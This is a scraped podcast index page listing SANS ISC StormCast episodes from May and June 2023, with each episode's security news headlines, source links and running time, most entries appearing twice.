Formbook From Possible ModiLoaeder (DBatLoader) https://isc.sans.edu/diary/Formbook%20from%20Possible%20ModiLoader%20%28DBatLoader%29%20/29958 Brute-Force ZIP Password Cracking with zipdump.py https://isc.sans.edu/diary/Brute-Force%20ZIP%20Password%20Cracking%20with%20zipdump.py/29948 Malware Delivered Through .inf File https://isc.sans.edu/diary/Malware%20Delivered%20Through%20.inf%20File/29960 FortiNAC - Just a few more RCEs https://frycos.github.io/vulns4free/2023/06/18/fortinac.html
6/20/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, June 20th, 2023

Formbook From Possible ModiLoaeder (DBatLoader) https://isc.sans.edu/diary/Formbook%20from%20Possible%20ModiLoader%20%28DBatLoader%29%20/29958 Brute-Force ZIP Password Cracking with zipdump.py https://isc.sans.edu/diary/Brute-Force%20ZIP%20Password%20Cracking%20with%20zipdump.py/29948 Malware Delivered Through .inf File https://isc.sans.edu/diary/Malware%20Delivered%20Through%20.inf%20File/29960 FortiNAC - Just a few more RCEs https://frycos.github.io/vulns4free/2023/06/18/fortinac.html
6/20/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, June 16th, 2023

Supervision and Verfication in Vulnerability Management https://isc.sans.edu/diary/Supervision%20and%20Verification%20in%20Vulnerability%20Management/29952 More MOVEit issues https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023 Critical Citrix Sharefile Storagezones Controller https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 Chromeloader Malware Update https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/ Bignum NPM Package Compromise https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers
6/16/20235 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, June 16th, 2023

Supervision and Verfication in Vulnerability Management https://isc.sans.edu/diary/Supervision%20and%20Verification%20in%20Vulnerability%20Management/29952 More MOVEit issues https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023 Critical Citrix Sharefile Storagezones Controller https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 Chromeloader Malware Update https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/ Bignum NPM Package Compromise https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers
6/16/20235 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, June 15th, 2023

Deobfuscating a VBS Script With Custom Encoding https://isc.sans.edu/diary/Deobfuscating%20a%20VBS%20Script%20With%20Custom%20Encoding/29940 Every Signature is Broken: On the Insecurity of Microsoft Office s OOXML Signatures https://www.usenix.org/conference/usenixsecurity23/presentation/rohlmann How to Manage the Vulnerailbity Associated with CVE-2023-32019 https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080 Fake Security Research GitHub Repos https://vulncheck.com/blog/fake-repos-deliver-malicious-implant Fortigate Vuln Details https://blog.lexfo.fr/xortigate-cve-2023-27997.html Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/
6/15/20235 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, June 15th, 2023

Deobfuscating a VBS Script With Custom Encoding https://isc.sans.edu/diary/Deobfuscating%20a%20VBS%20Script%20With%20Custom%20Encoding/29940 Every Signature is Broken: On the Insecurity of Microsoft Office s OOXML Signatures https://www.usenix.org/conference/usenixsecurity23/presentation/rohlmann How to Manage the Vulnerailbity Associated with CVE-2023-32019 https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080 Fake Security Research GitHub Repos https://vulncheck.com/blog/fake-repos-deliver-malicious-implant Fortigate Vuln Details https://blog.lexfo.fr/xortigate-cve-2023-27997.html Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/
6/15/20235 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, June 14th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/June%202023%20Microsoft%20Patch%20Tuesday/29942/ VMWare 0-Day https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass https://www.vmware.com/security/advisories/VMSA-2023-0013.html SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
6/14/20235 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, June 14th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/June%202023%20Microsoft%20Patch%20Tuesday/29942/ VMWare 0-Day https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass https://www.vmware.com/security/advisories/VMSA-2023-0013.html SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
6/14/20235 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, June 13th, 2023

Geoserver Attack Details: More Cryptominers Against Unconfigured WebApps https://isc.sans.edu/diary/Geoserver%20Attack%20Details%3A%20More%20Cryptominers%20against%20Unconfigured%20WebApps/29936 Fortinet Update CVE-2023-27997 https://www.fortiguard.com/psirt/FG-IR-23-097 Bitwarden Key Accessible By Low Privileged User https://hackerone.com/reports/1874155 Western Digital SMART Flag Abuse https://arstechnica.com/gadgets/2023/06/clearly-predatory-western-digital-sparks-panic-anger-for-age-shaming-hdds/
6/13/20235 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, June 13th, 2023

Geoserver Attack Details: More Cryptominers Against Unconfigured WebApps https://isc.sans.edu/diary/Geoserver%20Attack%20Details%3A%20More%20Cryptominers%20against%20Unconfigured%20WebApps/29936 Fortinet Update CVE-2023-27997 https://www.fortiguard.com/psirt/FG-IR-23-097 Bitwarden Key Accessible By Low Privileged User https://hackerone.com/reports/1874155 Western Digital SMART Flag Abuse https://arstechnica.com/gadgets/2023/06/clearly-predatory-western-digital-sparks-panic-anger-for-age-shaming-hdds/
6/13/20235 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, June 12th, 2023

Undetected PowerShell Backdoor Disduigsed as a Profiled File https://isc.sans.edu/diary/Undetected%20PowerShell%20Backdoor%20Disguised%20as%20a%20Profile%20File/29930 DShield Honeypot Activity for May 2023 https://isc.sans.edu/diary/DShield%20Honeypot%20Activity%20for%20May%202023%20/29932 Second MOVEit Vulnerability https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability Fortinet Patches CVE-2023-27997 https://twitter.com/cfreal_/status/1667852157536616451
6/12/20235 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, June 12th, 2023

Undetected PowerShell Backdoor Disduigsed as a Profiled File https://isc.sans.edu/diary/Undetected%20PowerShell%20Backdoor%20Disguised%20as%20a%20Profile%20File/29930 DShield Honeypot Activity for May 2023 https://isc.sans.edu/diary/DShield%20Honeypot%20Activity%20for%20May%202023%20/29932 Second MOVEit Vulnerability https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability Fortinet Patches CVE-2023-27997 https://twitter.com/cfreal_/status/1667852157536616451
6/12/20235 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, June 9th, 2023

Geoserver Scans https://isc.sans.edu/diary/Ongoing%20scans%20for%20Geoserver/29926 Barracuda Recommends Replacing Compromised Devices https://www.barracuda.com/company/legal/esg-vulnerability Google improves Chrome Password Manager https://www.msn.com/en-us/news/other/chrome-adds-windows-biometric-logins-to-its-password-powers/ar-AA1ciCCf Minecraft Mods Include Malicious Code https://www.bleepingcomputer.com/news/security/new-fractureiser-malware-used-curseforge-minecraft-mods-to-infect-windows-linux/ Trend Micro Service Pack https://files.trendmicro.com/documentation/readme/Apex%20One/2020/apex_one_2019_win_cp_b12033_EN_Critical_Patch_Readme.html
6/9/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, June 9th, 2023

Geoserver Scans https://isc.sans.edu/diary/Ongoing%20scans%20for%20Geoserver/29926 Barracuda Recommends Replacing Compromised Devices https://www.barracuda.com/company/legal/esg-vulnerability Google improves Chrome Password Manager https://www.msn.com/en-us/news/other/chrome-adds-windows-biometric-logins-to-its-password-powers/ar-AA1ciCCf Minecraft Mods Include Malicious Code https://www.bleepingcomputer.com/news/security/new-fractureiser-malware-used-curseforge-minecraft-mods-to-infect-windows-linux/ Trend Micro Service Pack https://files.trendmicro.com/documentation/readme/Apex%20One/2020/apex_one_2019_win_cp_b12033_EN_Critical_Patch_Readme.html
6/9/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, June 8th, 2023

DMARC in .co TLD https://isc.sans.edu/diary/Management%20of%20DMARC%20control%20for%20email%20impersonation%20of%20domains%20in%20the%20.co%20TLD%20-%20part%202/29922 Three Vulnerabilities in VMWare Aria Operations for Networks https://www.vmware.com/security/advisories/VMSA-2023-0012.html SpinOK Spyware SDK found in Android Apps https://vms.drweb.com/search/?q=Android.Spy.SpinOk&lng=en https://www.cloudsek.com/threatintelligence/supply-chain-attack-infiltrates-android-apps-with-malicious-sdk Cisco Anyconnect Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-csc-privesc-wx4U4Kw RSA Webcast https://www.rsaconference.com/library/webcast/149-sans-followup-2023
6/8/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, June 8th, 2023

DMARC in .co TLD https://isc.sans.edu/diary/Management%20of%20DMARC%20control%20for%20email%20impersonation%20of%20domains%20in%20the%20.co%20TLD%20-%20part%202/29922 Three Vulnerabilities in VMWare Aria Operations for Networks https://www.vmware.com/security/advisories/VMSA-2023-0012.html SpinOK Spyware SDK found in Android Apps https://vms.drweb.com/search/?q=Android.Spy.SpinOk&lng=en https://www.cloudsek.com/threatintelligence/supply-chain-attack-infiltrates-android-apps-with-malicious-sdk Cisco Anyconnect Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-csc-privesc-wx4U4Kw RSA Webcast https://www.rsaconference.com/library/webcast/149-sans-followup-2023
6/8/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, June 7th, 2023

Github Copilot vs Google: Which Code is More Secure https://isc.sans.edu/forums/diary/Github%20Copilot%20vs.%20Google%3A%20Which%20code%20is%20more%20secure/29918/ Android Update https://source.android.com/docs/security/bulletin/2023-06-01 Chrome Updates https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop.html FBI Warns of Manipulated Photos and Videos For Sextortion https://www.ic3.gov/Media/Y2023/PSA230605
6/7/20236 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, June 7th, 2023

Github Copilot vs Google: Which Code is More Secure https://isc.sans.edu/forums/diary/Github%20Copilot%20vs.%20Google%3A%20Which%20code%20is%20more%20secure/29918/ Android Update https://source.android.com/docs/security/bulletin/2023-06-01 Chrome Updates https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop.html FBI Warns of Manipulated Photos and Videos For Sextortion https://www.ic3.gov/Media/Y2023/PSA230605
6/7/20236 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, June 6th, 2023

Brute Forcing Simple Archive Passwords https://isc.sans.edu/diary/Brute%20Forcing%20Simple%20Archive%20Passwords/29914 KeePass 2.54 Released https://keepass.info/news/n230603_2.54.html Splunk Advisories https://advisory.splunk.com/advisories Malicious Google Chrome Extensions https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/ Symantec Updates https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/22217
6/6/20235 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, June 6th, 2023

Brute Forcing Simple Archive Passwords https://isc.sans.edu/diary/Brute%20Forcing%20Simple%20Archive%20Passwords/29914 KeePass 2.54 Released https://keepass.info/news/n230603_2.54.html Splunk Advisories https://advisory.splunk.com/advisories Malicious Google Chrome Extensions https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/ Symantec Updates https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/22217
6/6/20235 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, June 5th, 2023

Critical Vulnerability in MoveIT Transfer Actively Exploited https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/ https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft Atomic Wallet Compromise https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/ Magecart Update https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
6/5/20235 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, June 5th, 2023

Critical Vulnerability in MoveIT Transfer Actively Exploited https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/ https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft Atomic Wallet Compromise https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/ Magecart Update https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
6/5/20235 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, June 2nd, 2023

After 28 Years, SSLv2 is Still Not Gone https://isc.sans.edu/forums/diary/After%2028%20years%2C%20SSLv2%20is%20still%20not%20gone%20from%20the%20internet...%20but%20we're%20getting%20there/29908/ Operation Triangulation: iOS Devices Targeted With Previously Unknown Malware https://securelist.com/operation-triangulation/109842/ MOVEit Transfer Criticial Vulnerability https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 Code Injection Vulnerablity in Reportlab Python Library https://github.com/c53elyas/CVE-2023-33733
6/2/202317 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, June 2nd, 2023

After 28 Years, SSLv2 is Still Not Gone https://isc.sans.edu/forums/diary/After%2028%20years%2C%20SSLv2%20is%20still%20not%20gone%20from%20the%20internet...%20but%20we're%20getting%20there/29908/ Operation Triangulation: iOS Devices Targeted With Previously Unknown Malware https://securelist.com/operation-triangulation/109842/ MOVEit Transfer Criticial Vulnerability https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 Code Injection Vulnerablity in Reportlab Python Library https://github.com/c53elyas/CVE-2023-33733
6/2/202317 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, June 1st, 2023

Apache NiFi Attacks https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900 Gigabyte App Center Backdoor; https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/ Salesforce Ghost Sites https://www.varonis.com/blog/salesforce-ghost-sites CVE-2023-34152: Shell Command Injection in ImageMagick https://securityonline.info/cve-2023-34152-shell-command-injection-bug-affecting-imagemagick/
6/1/20236 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, June 1st, 2023

Apache NiFi Attacks https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900 Gigabyte App Center Backdoor; https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/ Salesforce Ghost Sites https://www.varonis.com/blog/salesforce-ghost-sites CVE-2023-34152: Shell Command Injection in ImageMagick https://securityonline.info/cve-2023-34152-shell-command-injection-bug-affecting-imagemagick/
6/1/20236 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, May 31st, 2023

Malspam Pushes ModiLoader Infection for Remocs Rat https://isc.sans.edu/diary/Malspam%20pushes%20ModiLoader%20%28DBatLoader%29%20infection%20for%20Remcos%20RAT/29896 MacOS SIP Bypass https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/ OpenSSL Update https://www.openssl.org/news/secadv/20230530.txt Barracuda Email Security Gateway Applicance Vulnerability Details https://www.barracuda.com/company/legal/esg-vulnerability#:~:text=the%20section%20below.-,Endpoint%20IOCs,-Table%204%20lists Void Rabisu RomCom Backdoor https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html Nextcloud Vulnerability https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mr7q-xf62-fw54 Zyxel NAS Vulnerability https://sternumiot.com/iot-blog/ntp-textbox-vulnerability-in-zyxel-nas326-nas540-and-nas542-devices/ Wait Just An Infosec: Higher Ed https://www.youtube.com/watch?v=ufEuo-096yc&list=PLtgaAEEmVe6B2kqkE9KdgPJdtbqNiaiOn&index=8
5/31/20235 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, May 31st, 2023

Malspam Pushes ModiLoader Infection for Remocs Rat https://isc.sans.edu/diary/Malspam%20pushes%20ModiLoader%20%28DBatLoader%29%20infection%20for%20Remcos%20RAT/29896 MacOS SIP Bypass https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/ OpenSSL Update https://www.openssl.org/news/secadv/20230530.txt Barracuda Email Security Gateway Applicance Vulnerability Details https://www.barracuda.com/company/legal/esg-vulnerability#:~:text=the%20section%20below.-,Endpoint%20IOCs,-Table%204%20lists Void Rabisu RomCom Backdoor https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html Nextcloud Vulnerability https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mr7q-xf62-fw54 Zyxel NAS Vulnerability https://sternumiot.com/iot-blog/ntp-textbox-vulnerability-in-zyxel-nas326-nas540-and-nas542-devices/ Wait Just An Infosec: Higher Ed https://www.youtube.com/watch?v=ufEuo-096yc&list=PLtgaAEEmVe6B2kqkE9KdgPJdtbqNiaiOn&index=8
5/31/20235 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, May 30th, 2023

Analyzing Office Documents Embedded Inside PowerPoint Files https://isc.sans.edu/diary/Analyzing%20Office%20Documents%20Embedded%20Inside%20PPT%20%28PowerPoint%29%20Files/29894 DocuSign Themed Email Leads to Script-Based Infection https://isc.sans.edu/diary/DocuSign-themed%20email%20leads%20to%20script-based%20infection/29888 File Archiver In The Browser https://mrd0x.com/file-archiver-in-the-browser/ Securing PyPI accounts via Two-Factor Authentication https://blog.pypi.org/posts/2023-05-25-securing-pypi-with-2fa/ Apache Casandra Vulnerabilities https://lists.apache.org/thread/mwd02nrw2go8shg29rnp3o4hgompvkp5 MOXA MXsecurity Vulerabilities https://www.moxa.com/en/support/product-support/security-advisory/mxsecurity-command-injection-and-hardcoded-credential-vulnerabilities
5/30/20235 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, May 30th, 2023

Analyzing Office Documents Embedded Inside PowerPoint Files https://isc.sans.edu/diary/Analyzing%20Office%20Documents%20Embedded%20Inside%20PPT%20%28PowerPoint%29%20Files/29894 DocuSign Themed Email Leads to Script-Based Infection https://isc.sans.edu/diary/DocuSign-themed%20email%20leads%20to%20script-based%20infection/29888 File Archiver In The Browser https://mrd0x.com/file-archiver-in-the-browser/ Securing PyPI accounts via Two-Factor Authentication https://blog.pypi.org/posts/2023-05-25-securing-pypi-with-2fa/ Apache Casandra Vulnerabilities https://lists.apache.org/thread/mwd02nrw2go8shg29rnp3o4hgompvkp5 MOXA MXsecurity Vulerabilities https://www.moxa.com/en/support/product-support/security-advisory/mxsecurity-command-injection-and-hardcoded-credential-vulnerabilities
5/30/20235 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, May 26th, 2023

IR Case/Alert Management https://isc.sans.edu/diary/IR%20Case%20Alert%20Management/29880 Exploit for CVE-2023-2825 GitLab Vulnerability https://github.com/Occamsec/CVE-2023-2825 Expo Framework OAUTH Vulnerability CVE-2023-28131 https://salt.security/blog/a-new-oauth-vulnerability-that-may-impact-hundreds-of-online-services Mitel MiVoice Vulnerability CVE-2023-31457 CVE-2023-32748 https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0004 D-Link Vulnerabilities https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10332
5/26/20235 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, May 26th, 2023

IR Case/Alert Management https://isc.sans.edu/diary/IR%20Case%20Alert%20Management/29880 Exploit for CVE-2023-2825 GitLab Vulnerability https://github.com/Occamsec/CVE-2023-2825 Expo Framework OAUTH Vulnerability CVE-2023-28131 https://salt.security/blog/a-new-oauth-vulnerability-that-may-impact-hundreds-of-online-services Mitel MiVoice Vulnerability CVE-2023-31457 CVE-2023-32748 https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0004 D-Link Vulnerabilities https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10332
5/26/20235 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, May 25th, 2023

More Data Enrichment for Cowrie Logs https://isc.sans.edu/diary/More%20Data%20Enrichment%20for%20Cowrie%20Logs/29878 Volt Typhoon: Living of the Land https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF Android App Breaking Bad https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/ Zyxel Updates https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls Baracuda Email Security Gateway Vulnerability https://status.barracuda.com/incidents/34kx82j5n4q9 Gitlab Patch https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
5/25/20235 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, May 25th, 2023

More Data Enrichment for Cowrie Logs https://isc.sans.edu/diary/More%20Data%20Enrichment%20for%20Cowrie%20Logs/29878 Volt Typhoon: Living of the Land https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF Android App Breaking Bad https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/ Zyxel Updates https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls Baracuda Email Security Gateway Vulnerability https://status.barracuda.com/incidents/34kx82j5n4q9 Gitlab Patch https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
5/25/20235 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, May 24th, 2023

Apache Nifi Scans https://isc.sans.edu/diary/Help+us+figure+this+out+Scans+for+Apache+Nifi/29874/ Samsung Updates fix 0-Day https://security.samsungmobile.com/securityUpdate.smsb Lenovo All-In One Bricked by Windows Update https://www.reddit.com/r/Lenovo/comments/136tatm/lenovo_firmware_10055_bricking_thinkcentre_v53024/ Dell VxRail Security Update https://www.dell.com/support/kbdoc/en-us/000213011/dsa-2023-071-dell-vxrail-security-update-for-multiple-third-party-component-vulnerabilities-7-0-450 BrutePrint: Expose Smartphone Fingerprint Authentication to Brute-force Attack https://arxiv.org/pdf/2305.10791.pdf
5/24/20236 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, May 24th, 2023

Apache Nifi Scans https://isc.sans.edu/diary/Help+us+figure+this+out+Scans+for+Apache+Nifi/29874/ Samsung Updates fix 0-Day https://security.samsungmobile.com/securityUpdate.smsb Lenovo All-In One Bricked by Windows Update https://www.reddit.com/r/Lenovo/comments/136tatm/lenovo_firmware_10055_bricking_thinkcentre_v53024/ Dell VxRail Security Update https://www.dell.com/support/kbdoc/en-us/000213011/dsa-2023-071-dell-vxrail-security-update-for-multiple-third-party-component-vulnerabilities-7-0-450 BrutePrint: Expose Smartphone Fingerprint Authentication to Brute-force Attack https://arxiv.org/pdf/2305.10791.pdf
5/24/20236 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, May 23rd, 2023

Probes for recent ABUS Security Camera Vulnerability https://isc.sans.edu/diary/Probes%20for%20recent%20ABUS%20Security%20Camera%20Vulnerability%3A%20Attackers%20keep%20an%20eye%20on%20everything./29870 .ZIP Domains Confuse Virustotal https://twitter.com/imohanasundaram/status/1660678184977805316 Synology DSM 6.2 Patch https://www.synology.com/en-global/security/advisory/Synology_SA_22_25 Jenkins Fixes Multiple Plugin Vulnerabilities https://www.jenkins.io/security/advisory/2023-05-16/ PyPi Suspension Lifted https://status.python.org/incidents/qy2t9mjjcc7g Nissan Sylphy Classic Key Vulnerability https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-33281
5/23/20235 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, May 23rd, 2023

Probes for recent ABUS Security Camera Vulnerability https://isc.sans.edu/diary/Probes%20for%20recent%20ABUS%20Security%20Camera%20Vulnerability%3A%20Attackers%20keep%20an%20eye%20on%20everything./29870 .ZIP Domains Confuse Virustotal https://twitter.com/imohanasundaram/status/1660678184977805316 Synology DSM 6.2 Patch https://www.synology.com/en-global/security/advisory/Synology_SA_22_25 Jenkins Fixes Multiple Plugin Vulnerabilities https://www.jenkins.io/security/advisory/2023-05-16/ PyPi Suspension Lifted https://status.python.org/incidents/qy2t9mjjcc7g Nissan Sylphy Classic Key Vulnerability https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-33281
5/23/20235 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, May 22nd, 2023

Another Malicious HTA File Analysis - Part 3 https://isc.sans.edu/forums/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%203/29678/ When the Phisher Messes Up With Encoding https://isc.sans.edu/diary/When%20the%20Phisher%20Messes%20Up%20With%20Encoding/29864 PyPi Suspends New Users and Projects https://status.python.org/incidents/qy2t9mjjcc7g PGP Signatures on PyPi: Worse than useless https://blog.yossarian.net/2023/05/21/PGP-signatures-on-PyPI-worse-than-useless RATs found hiding in the npm attic https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
5/22/20235 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, May 22nd, 2023

Another Malicious HTA File Analysis - Part 3 https://isc.sans.edu/forums/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%203/29678/ When the Phisher Messes Up With Encoding https://isc.sans.edu/diary/When%20the%20Phisher%20Messes%20Up%20With%20Encoding/29864 PyPi Suspends New Users and Projects https://status.python.org/incidents/qy2t9mjjcc7g PGP Signatures on PyPi: Worse than useless https://blog.yossarian.net/2023/05/21/PGP-signatures-on-PyPI-worse-than-useless RATs found hiding in the npm attic https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
5/22/20235 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, May 19th, 2023

Apple Updates Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything/29860 A Quick Survey of .zip Domains https://isc.sans.edu/diary/A%20Quick%20Survey%20of%20.zip%20Domains%3A%20Your%20highest%20risk%20is%20running%20into%20Rick%20Astley./29858 Dell NetWorker Security Update https://www.dell.com/support/kbdoc/en-us/000211267/dsa-2023-060-dell-networker-security-update-for-an-nsrcapinfo-vulnerability?lwp=rt KeePass 2.X Master Password Dumper https://github.com/vdohney/keepass-password-dumper
5/19/20236 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, May 19th, 2023

Apple Updates Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything/29860 A Quick Survey of .zip Domains https://isc.sans.edu/diary/A%20Quick%20Survey%20of%20.zip%20Domains%3A%20Your%20highest%20risk%20is%20running%20into%20Rick%20Astley./29858 Dell NetWorker Security Update https://www.dell.com/support/kbdoc/en-us/000211267/dsa-2023-060-dell-networker-security-update-for-an-nsrcapinfo-vulnerability?lwp=rt KeePass 2.X Master Password Dumper https://github.com/vdohney/keepass-password-dumper
5/19/20236 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, May 18th, 2023

Increase in Malicious RAR SFX Files https://isc.sans.edu/forums/diary/Increase%20in%20Malicious%20RAR%20SFX%20files/29852/ FriendlyName Buffer Overflow in Wemo Smartplug https://sternumiot.com/iot-blog/mini-smart-plug-v2-vulnerability-buffer-overflow/ Wago License Page Exploit https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/ Routers Turned Into Proxies https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/
5/18/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, May 18th, 2023

Increase in Malicious RAR SFX Files https://isc.sans.edu/forums/diary/Increase%20in%20Malicious%20RAR%20SFX%20files/29852/ FriendlyName Buffer Overflow in Wemo Smartplug https://sternumiot.com/iot-blog/mini-smart-plug-v2-vulnerability-buffer-overflow/ Wago License Page Exploit https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/ Routers Turned Into Proxies https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/
5/18/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, May 17th, 2023

